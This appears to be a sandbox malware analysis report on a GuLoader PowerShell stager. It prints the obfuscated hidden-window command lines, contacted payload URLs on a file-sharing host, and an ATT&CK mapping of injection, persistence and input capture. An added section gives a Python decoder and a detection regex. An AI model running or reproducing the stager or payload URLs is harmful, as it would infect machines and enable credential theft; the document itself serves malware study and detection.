depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.cistanakaravlslag. ');$ame
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. 
karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.ci
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. 
karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.cistanakaravlslag. ');$ameJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.ci
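Added example, not code from the Joe Sandbox report or from the sample: a Python port of the string decoder that both PowerShell command lines above define. The stager assembles the method name `substring` from fragments (`'sub'+'strin'+'g'`) and calls it through `.invoke(`, then walks every obfuscated literal from index 5 in steps of 6, keeping one character per step while the index stays below length-1; the remaining five characters of each group are junk. Applied to the short literals in the command line, `$polarizer` decodes to `iex` (so `udkrte` dot-sources Invoke-Expression over each decoded fragment), `$pullouts` decodes to `user-agent` and `$spisestel` to `>`. The longer literals as rendered on this page appear to have had runs of spaces collapsed and do not decode cleanly; feed the decoder the command line from the raw process-creation event (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) rather than the copy on this page. The `encode_skip` helper and the constructed `new-object net.webclient` inline call are assumptions added for testing, not strings from the sample.

```python
"""Decoder for the string obfuscation used by the PowerShell stager above.

Added example, not code from the Joe Sandbox report or from the sample.  It
mirrors the function called 'circuted' in the command line: the stager builds
the method name 'substring' from fragments ('sub'+'strin'+'g'), then walks
each obfuscated literal from index 5 in steps of 6, keeping one character per
step while the index is below length-1.  Every sixth character is payload;
the other five are junk (here fragments of Danish words).
"""
import re
from typing import List, Optional, Tuple


def decode_skip(obf: str, start: int = 5, step: int = 6) -> str:
    """Port of the loop: for($i=start; $i -lt len-1; $i+=step) { out += s.substring($i,1) }."""
    limit = len(obf) - 1                        # $blazer = length - $colour, with $colour = 1
    return "".join(obf[i] for i in range(start, limit, step))


def encode_skip(plain: str, start: int = 5, step: int = 6, filler: str = "abcde") -> str:
    """Inverse transform (assumed; used only to build test vectors): 'start' junk
    chars, then each payload char separated by step-1 junk chars, then a trailing
    junk block so the last payload index stays below len-1 as the loop requires."""
    junk = filler * (start + step)
    out = junk[:start]
    for k, ch in enumerate(plain):
        out += (junk[:step - 1] if k else "") + ch
    return out + junk[:step]


# Shape of the decoder function as it appears in the command line.  Variable
# names are randomised per sample, so only the structure is matched.
DECODER_RE = re.compile(
    r"function\s+(\w+)\(\$\w+\)\{\$\w+=\$\w+\.length-\$\w+;"
    r"for\(\$(\w+)\s*=\s*(\d+);\s*\$\2\s+-lt\s+\$\w+;\s*\$\2\s*\+=\s*(\d+)\)"
)


def find_decoder(cmdline: str) -> Optional[Tuple[str, int, int]]:
    """Return (decoder function name, start index, step), or None if absent."""
    m = DECODER_RE.search(cmdline)
    return (m.group(1), int(m.group(3)), int(m.group(4))) if m else None


def decode_all(cmdline: str) -> List[Tuple[str, str]]:
    """Decode every single-quoted literal handed to the decoder function, in order.
    Each entry is (variable the result is assigned to, or '' for an inline call,
    decoded text).  PowerShell escapes a quote inside '...' as ''."""
    found = find_decoder(cmdline)
    if not found:
        return []
    name, start, step = found
    call_re = re.compile(r"(?:\$(\w+)\s*=\s*)?" + re.escape(name) + r"\s+'((?:[^']|'')*)'")
    return [
        (m.group(1) or "", decode_skip(m.group(2).replace("''", "'"), start, step))
        for m in call_re.finditer(cmdline)
    ]


# Sample input: the decoder definition and three short literals copied from the
# command line in the report, plus one constructed inline call (payload built
# with encode_skip; it is not a string from the sample).
SAMPLE_CMDLINE = (
    "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';"
    "function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;"
    "for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+="
    "$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}"
    "$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';"
    "$spisestel=circuted 'bolte>cubin ';"
    "$polarizer=circuted 's irriflykkera,idxkonst ';"
    "udkrte (circuted '" + encode_skip("new-object net.webclient") + "');"
)

if __name__ == "__main__":
    print(find_decoder(SAMPLE_CMDLINE))        # ('circuted', 5, 6)
    for var, text in decode_all(SAMPLE_CMDLINE):
        print(f"{var or '<inline>'}: {text!r}")
```

The regex keys on the structure rather than on any name, because GuLoader stagers of this kind re-randomise every identifier per build while keeping the substring-walk loop; the same property (a `.invoke(` call on a string-valued method name inside a `for` loop with a numeric step) is what makes the command line worth a detection rule regardless of the junk text around it.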
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
MITRE ATT&CK Matrix

Techniques with matched signatures, grouped by tactic. The figure in front of each technique is the count as rendered in the report's matrix; unhighlighted matrix cells (techniques the report lists but did not observe) are omitted.

Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 PowerShell
Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading
Privilege Escalation: 111 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading
Defense Evasion: 221 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 11 Input Capture
Discovery: 111 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: 1 Taint Shared Content
Collection: 11 Input Capture; 1 Archive Collected Data
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol
Reconnaissance, Resource Development, Initial Access, Exfiltration, Impact: no matched techniques
Behavior Graph (ID: 1446714; Sample: kam.cmd; Startdate: 23/05/2024; Architecture: WINDOWS; Score: 100)

Contacted hosts: www.sendspace.com; fs13n1.sendspace.com; fs03n4.sendspace.com
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Yara detected GuLoader; 5 other signatures

Process tree (the figures after a process name are the per-process counts drawn in the graph; network entries are given as host, IP, port, port, ASN, country, as in the graph):

cmd.exe 1 (started)
  signatures: Suspicious powershell command line found; Very long command line found
  - conhost.exe (started)
  - powershell.exe 14 23 (started)
      network: fs03n4.sendspace.com 69.31.136.17, 443, 49705, GTT-BACKBONEGTTDE, United States; www.sendspace.com 104.21.28.80, 443, 49704, 49713, CLOUDFLARENETUS, United States
      signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
      - conhost.exe (started)
      - cmd.exe 1 (started)
      - powershell.exe 17 (started)
          signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
          - cmd.exe 1 (started)
          - wab.exe 17 (started)
              network: fs13n1.sendspace.com 69.31.136.57, 443, 49714, GTT-BACKBONEGTTDE, United States
              dropped: C:\Windows\svchost.com (PE32); C:\Users\user\AppData\Local\Temp\chrome.exe (PE32); C:\ProgramData\...\VC_redist.x64.exe (PE32); 149 other malicious files
              signatures: Creates an undocumented autostart registry key; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)

Antivirus detection: sample
Source | Detection | Scanner | Label | Link
kam.cmd | 0% | ReversingLabs | |

Antivirus detection: dropped files
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
Antivirus detection: URLs
Source | Detection | Scanner | Label | Link
https://contoso.com/License | 0% | URL Reputation | safe |
http://tempuri.org/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
http://java.sun.com | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/ReadSettings | 0% | Avira URL Cloud | safe |
https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin | 0% | Avira URL Cloud | safe |
http://stackoverflow.com/a/15123777) | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/12aciiyl | 0% | Avira URL Cloud | safe |
http://www.computerhope.com/forum/index.php?topic=76293.0 | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/i41a76XRll | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe |
http://www.tutorialspoint.com/javascript/array_map.htm | 0% | Avira URL Cloud | safe |
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | 0% | Avira URL Cloud | safe |
http://stackoverflow.com/a/1465386/4224163 | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/DisableUser | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspaX | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/GetConfigResponse | 0% | Avira URL Cloud | safe |
https://aka.ms/pscore6lBjq | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R | 0% | Avira URL Cloud | safe |
http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pr | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/12aciiBl | 0% | Avira URL Cloud | safe |
https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm | 0% | Avira URL Cloud | safe |
https://fs13n1.sendspace.com/=6 | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/i41a76P | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/12acii | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/i41a76 | 0% | Avira URL Cloud | safe |
http://www.sendspace.com | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://www.sendspace.com | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/J | 0% | Avira URL Cloud | safe |
http://es5.github.io/#x15.4.4.21 | 0% | Avira URL Cloud | safe |
https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml | 0% | Avira URL Cloud | safe |
https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/WriteSettings | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/EnableUserResponse | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/DisableUserResponse | 0% | Avira URL Cloud | safe |
http://java.sun.comnot | 0% | Avira URL Cloud | safe |
http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript | 0% | Avira URL Cloud | safe |
https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml | 0% | Avira URL Cloud | safe |
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce | 0% | Avira URL Cloud | safe |
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/GetConfig | 0% | Avira URL Cloud | safe |
http://fs03n4.sendspace.com | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfR | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/EnableUser | 0% | Avira URL Cloud | safe |
http://stackoverflow.com/questions/1068834/object-comparison-in-javascript | 0% | Avira URL Cloud | safe |
http://tempuri.org/IRoamingSettingsService/ReadSettingsResponse | 0% | Avira URL Cloud | safe |
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim | 0% | Avira URL Cloud | safe |
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf | 0% | Avira URL Cloud | safe |
https://fs13n1.sendspace.com/ | 0% | Avira URL Cloud | safe |
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | 0% | Avira URL Cloud | safe |
https://fs13n1.sendspace.com/Z6: | 0% | Avira URL Cloud | safe |
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs03n4.sendspace.com | 69.31.136.17 | true | false | - | unknown
www.sendspace.com | 104.21.28.80 | true | false | - | unknown
fs13n1.sendspace.com | 69.31.136.57 | true | false | - | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/12acii | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/i41a76 | false | Avira URL Cloud: safe | unknown
URLs from memory and dropped files
Name | Source | Malicious | Antivirus Detection | Reputation
https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/12aciiyl | wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/i41a76XRll | powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
